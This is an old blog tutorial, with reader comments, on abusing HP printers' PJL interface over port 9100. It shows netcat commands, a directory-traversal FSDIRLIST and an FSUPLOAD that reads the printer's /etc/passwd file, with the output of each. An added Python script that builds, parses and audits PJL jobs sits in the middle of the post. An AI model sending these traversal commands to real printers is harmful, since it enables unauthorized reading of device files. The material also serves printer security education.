Thursday, December 1, 2011

“Hacking” Printers - PJL Basics

Notice the quotes in the title? That’s because this particular write up is about knowing and understanding the basics. A long time ago, you became a “hacker” because you were someone who was an expert in a subject.
I know people that have forgotten more about VMS than I could ever learn. They became known as a VMS “hacker” because they knew everything that could be known about VMS.
A short while later in my career, I got to be known as the AIX “hacker” because I knew more about AIX than even some IBM techs I’d talk to on the phone. That’s why the term “Hacking” in the title has quotes. What we’re going to talk about today is understanding some very basic features that most people have forgotten about and being able to manipulate those features to help us do some bad stuff.

HP Printer Vulnerability
I’ve been surrounded by a lot of debate since the HP printer vulnerability controversy sparked up (like the pun?) earlier this week. If you’ve NOT been living with your head buried in the sand the past few days, then you’ve no doubt heard that security researchers have dug into some inherent functionality in HP printers and figured out a way to use it to do some things that could cause some alarm. HP has since officially argued that claims about burning printers are sensationalistic.
I’ve been personally dragged into a couple of misguided conversations regarding these new findings and there are a few things that I don’t think have been made crystal clear about the vulnerabilities. With that in mind, I figured we could take a few moments here at Hack On A Dime to refamiliarize ourselves with the basics of HP Printers and focus on what’s at the heart of the new research: PJL.
For those that are not familiar, PJL is very nearly the heart of communication with print queues. But, let’s not get ahead of ourselves.

Printer Communication

Printers are, in essence, simply computers. They communicate via the network, like PCs, but, unfortunately, they may be the most neglected devices on any network. A sampling of printers tested (later in this article) showed me that they hadn’t had firmware updates in well over a year. (This helped me greatly, because the vulnerability I ended up exploiting was found within that year, so I really shouldn’t complain.)
HP Printers have five main ways of communicating on the network, if they’re networked and using JetDirect:

  • HTTP
  • HTTPS
  • Telnet
  • SNMP
  • PCL / PJL
HTTP and HTTPS are served through what HP calls the Embedded Web Server, or EWS. Now, most administrators, when deploying HP printers, turn off HTTP in favor of HTTPS. Ok, maybe not most, but those that have an understanding of security know that HTTPS is better than HTTP, so they usually turn off communications on port 80 in favor of port 443 (HTTPS).

If an admin communicates with their printer through Telnet, the Telnet password is usually the same as the EWS password. SNMP is a whole other discussion (and a whole other vulnerability discussion – did you know you can snmpwalk an HP printer without the community string? Yeah, we’ll talk about THAT later).

But what’s interesting is PJL, the Printer Job Language. An extension of PCL (the Printer Command Language, which is how print jobs are communicated to printers), PJL is another way to communicate with the printer and has some … INTERESTING features that help us, the hacker.

PJL, by the way, can be password protected (with a password separate from the EWS/Telnet one), so you can actually protect the printing stream (a little). The following examples, however, were run successfully on an HP printer without a PJL password set. But, let’s face facts, nearly 99.9% of the printers out there WILL NOT have the PJL password set.

So, let’s take a look at how we can use PJL to make the printer do some interesting things. NOTE: below, where [ESC] is used, you need to actually insert the ESCAPE character (ASCII 27, hex 0x1B). I highly suggest you use Notepad++ to craft the ASCII commands; regular Notepad just won’t cut it. And, lastly, you should know that in order to send the commands to the printer, you’re going to use netcat.exe (or nc.exe). Netcat sends the commands in a “raw”, unadulterated way so the printer will interpret them correctly.

First, if you want to try something easy out, you can tell the printer to change the “READY” message to something else.

The code to change the “READY” message to “Igor!!!!” is:

[ESC]%-12345X@PJL RDYMSG DISPLAY="Igor!!!!"
[ESC]%-12345X

You can paste that code into Notepad++, substitute the [ESC] with the actual Escape character and save the file to a directory. In a Windows environment, you can open a DOS box and issue the “type” command to “echo” the file to netcat. For instance, if you had saved the file as “pjl1.txt”, you can do the following:

type pjl1.txt | nc -v -v <PRINTER IP ADDRESS> 9100

Linux folks can, of course, use “echo” to perform the same thing. Regardless, sending that code to the printer resulted in the printer’s display message reading “Igor!!!!” (the original post shows a photo of the printer display here).

Knowing that the printer accepts PJL code, we can now start to send it way more interesting code. Like what you ask? Well, thanks to a vulnerability associated with PJL code and directory traversal (you know, the practice of inserting periods and slashes into a pathname to traverse the directory structure and get to places you shouldn’t?) we can start to list out the contents of the hard drives that are installed in the printer.

In HP’s world, the main drive is called drive “0:” and the next drive is called drive “1:”. So, for you Windows folks, you have “C:” and the HP printers have “0:”. So, let’s go ahead and list out the “etc” directory.

This code lists out the contents of the ‘etc’ directory for me:

[ESC]%-12345X@PJL FSDIRLIST NAME="0:\\..\\..\\..\\etc" ENTRY=1 COUNT=999999
[ESC]%-12345X

Save this file and “type” it out to netcat.

type pjl-fsdirlist.txt | nc -v -v <IP Address of Printer> 9100

And this was the output of the command:

[Fully Qualified Domain Name] [IP Address] 9100 (?) open
@PJL FSDIRLIST NAME="0:\\..\\..\\..\\etc" ENTRY=1
. TYPE=DIR
.. TYPE=DIR
hp TYPE=DIR
starttab TYPE=FILE SIZE=315
passwd TYPE=FILE SIZE=23
ttys TYPE=FILE SIZE=1357
hosts TYPE=FILE SIZE=159
resolv.conf TYPE=FILE SIZE=53
fsdev TYPE=FILE SIZE=681
fstab TYPE=FILE SIZE=247

Using the PJL commands to interact with the Filesystem is not a hack, it is a feature. However, it is a feature that we can use to view the contents of the hard drives and even the contents of the files. See that “passwd” file up there? Let’s see what’s in it.

This code (the FSUPLOAD command) allowed me to view the contents of the file by sending a print job to the printer.

[ESC]%-12345X@PJL FSUPLOAD NAME="0:\\..\\..\\..\\etc\passwd" OFFSET=0 SIZE=22000
[ESC]%-12345X

The output of this command looked like this:

type pjl1.txt | nc -v -v <IP Address of Printer> 9100
Fully Qualified Domain Name [IP Address of Printer] 9100 (?) open
@PJL FSUPLOAD FORMAT:BINARY NAME="0:\\..\\..\\..\\etc\passwd" OFFSET=0 SIZE=23
root::0:0::/:/bin/dlsh
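As an added example (not code from the original post), here is a short Python script that does three things the text above describes by hand: it frames PJL commands with the real ESC byte that the [ESC] placeholder stands for, it parses an FSDIRLIST reply of the shape shown above into structured entries, and, for the defender's side, it flags the PJL file system commands and any ".." traversal in a job captured from port 9100. The sample reply is constructed from the output above, and the function names (build_pjl_job, parse_fsdirlist, audit_pjl_job) are my own.

```python
import re

ESC = b"\x1b"              # the [ESC] placeholder in the post is this one byte (ASCII 27)
UEL = ESC + b"%-12345X"    # Universal Exit Language: switches the printer into/out of PJL

def build_pjl_job(commands):
    """Frame PJL command lines in UEL; returns the raw bytes you would pipe to port 9100."""
    body = b"".join(b"@PJL " + c.encode("ascii") + b"\r\n" for c in commands)
    # The first @PJL must follow the opening UEL with no space; a closing UEL ends the job.
    return UEL + body + UEL

# A reply of the shape shown in the post for FSDIRLIST (constructed sample, not a capture).
SAMPLE_REPLY = b"\r\n".join([
    rb'@PJL FSDIRLIST NAME="0:\\..\\..\\..\\etc" ENTRY=1',
    b". TYPE=DIR", b".. TYPE=DIR", b"hp TYPE=DIR",
    b"starttab TYPE=FILE SIZE=315", b"passwd TYPE=FILE SIZE=23",
])
ENTRY_RE = re.compile(r"^(?P<name>.+?) TYPE=(?P<type>DIR|FILE)(?: SIZE=(?P<size>\d+))?$")

def parse_fsdirlist(reply):
    """Turn an FSDIRLIST reply into a list of {name, type, size} dicts (size is None for DIR)."""
    entries = []
    for line in reply.decode("ascii", "replace").splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            entries.append({"name": m["name"], "type": m["type"],
                            "size": int(m["size"]) if m["size"] else None})
    return entries

# PJL file system command family from the HP PJL Technical Reference (the post uses
# FSDIRLIST and FSUPLOAD; a comment below uses FSMKDIR and FSDOWNLOAD).
FS_COMMANDS = {"FSAPPEND", "FSDELETE", "FSDIRLIST", "FSDOWNLOAD",
               "FSINIT", "FSMKDIR", "FSQUERY", "FSUPLOAD"}

def audit_pjl_job(job):
    """Defender-side check on a job captured from port 9100: which file system
    commands it carries and whether any of them uses '..' path traversal."""
    findings = []
    for m in re.finditer(rb"@PJL\s+([A-Z]+)([^\r\n]*)", job):
        cmd = m.group(1).decode("ascii")
        args = m.group(2).decode("ascii", "replace")
        if cmd in FS_COMMANDS:
            findings.append({"command": cmd, "traversal": ".." in args})
    return findings

if __name__ == "__main__":
    job = build_pjl_job([r'FSUPLOAD NAME="0:\\..\\..\\..\\etc\\passwd" OFFSET=0 SIZE=22000'])
    print(audit_pjl_job(job))            # one FSUPLOAD finding, traversal flagged
    print(parse_fsdirlist(SAMPLE_REPLY))  # five entries, passwd is a 23-byte FILE
```

The bytes returned by build_pjl_job can be written to a file and piped to netcat exactly as the post does with the Notepad++ file; audit_pjl_job is the piece you would run on traffic captured on the way to port 9100.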

Conclusion
Hopefully, this tutorial helps illustrate for you some basic PJL commands and how to use them to interact with printers. If you want to learn more about PJL commands, go ahead and google “PJL reference manual”; you’ll get a number of hits listing PDFs containing a ton of PJL commands you can use to mess around with the printers you find on networks you test.

Or, if you decide to really take the quick hacker highway, you can check out this script on attackvector that combines a lot of this stuff together in one Perl script.

Or, if you’re a Metasploit user, you can check out this module that also executes PJL queries.

The key thing to take away from this tutorial is this: the new security research may or may not be 100% accurate, but it should be a launching point for discussion and your expert knowledge in this subject should help you educate others who may not quite understand the claims that are being made regarding the vulnerability of HP Printers.

44 comments:

  2. Hi
    Kind of fun... I'm also in the middle of hacking a few HP printers.. actually on request to do so...
    Question: Can the FSDIRLIST be disabled in any way ??
    Reason being that although wanting to do just the listing of all the macros.. I do not get any output at all.. nor the listing of the "O:\pcl\macros" that I would like to...
    Any help is appreciated!

    Replies
    1. According to this: http://h20000.www2.hp.com/bc/docs/support/SupportManual/bpl13208/bpl13208.pdf there's no discussion regarding disabling the FSDIRLIST command. But enabling passwords for PJL will make it so you can't submit a PJL job with FSDIRLIST and have it execute (without the password). Any jobs submitted without the correct PJL password will look like they are working and then do absolutely nothing. It sounds to me that the target may have PJL passwords enabled. The behavior you describe sounds like it's protected that way.

    2. Hi
      Command is like this:
      ^[%-12345X@PJL
      @PJL COMMENT XRXbegin
      @PJL COMMENT OID_ATT_START_SHEET OID_VAL_JOB_SHEET_NONE
      @PJL COMMENT OID_ATT_ACCOUNTING_INFORMATION "FMUUSER|042FMUACCOUNT"
      @PJL COMMENT XRXend
      @PJL FSMKDIR NAME="0:\pcl\macros"
      @PJL FSDOWNLOAD FORMAT:BINARY NAME="0:\pcl\macros\15" SIZE=19800
      .....
      ^[%-12345X
      which works well for the download of macros.. but doing a FSDIRLIST on the same directory.... gives no output whatsoever!!
      I am really baffled by this....
      ideas will be appreciated!
      (Needless to say the FSDIRLIST is to make certain that the needed macros have been downloaded and to verify the download)

  6. Here's how you do that one, without downloading anything... Just paste into a command line, replacing "Printer IP" with your printer's IP.

    Note: Type in all caps.

    ----------

    Telnet Printer IP 9100

    @PJL RDYMSG DISPLAY="INSERT COIN"

    ^]

    quit

  7. Do you know a hack for HP printers' region code locking? I have an HP PSC 1300 series lying wasted with me since 4 years because it was purchased in Europe and Indian cartridges don't work on it. I also have 4 brand new colour and black cartridges lying waste which I purchased hurriedly out here. Would really appreciate the help. Thanks in advance!

  10. So, how do you secure a printer against PJL/Telnet hacks? I set an admin passwd, disabled telnet, and added a PJL password#. Still, I can change the display via telnet. HP P3015.

  11. Hi Drew,
    I tried the following command on one of our HP LaserJet printers, which I confirmed has no PJL password enabled. I did not get any response back and finally I had to use CTRL-C to quit.

    type cplock.pjl | nc -v -v xxx.xxx.xxx.xxx 9100
    where cplock.pjl's content is as follows (I used ALT 027 to insert [ESC]):
    [ESC]%-12345X@PJL JOB
    @PJL DEFAULT CPLOCK = MINIMUM
    @PJL EOJ
    [ESC]%-12345X

  17. @Admin

    Can You please guide me how i can install my HP 5000 Printer driver? Where can i download it?

    Regards
    Susane

  18. I am not sure about the idea of hacking a printer and how it helps consumers. All I want is to get cheap printer ink for my everyday print usage.

  22. Does anybody know if there is another way to send PJL code to a printer without using NetCat? I would like to try to avoid using NetCat as it appears... sketchy. I have tried using the FTP interface already, but no luck. Any help would be greatly appreciated, as I have been trying to resolve this for days!

    Thanks!
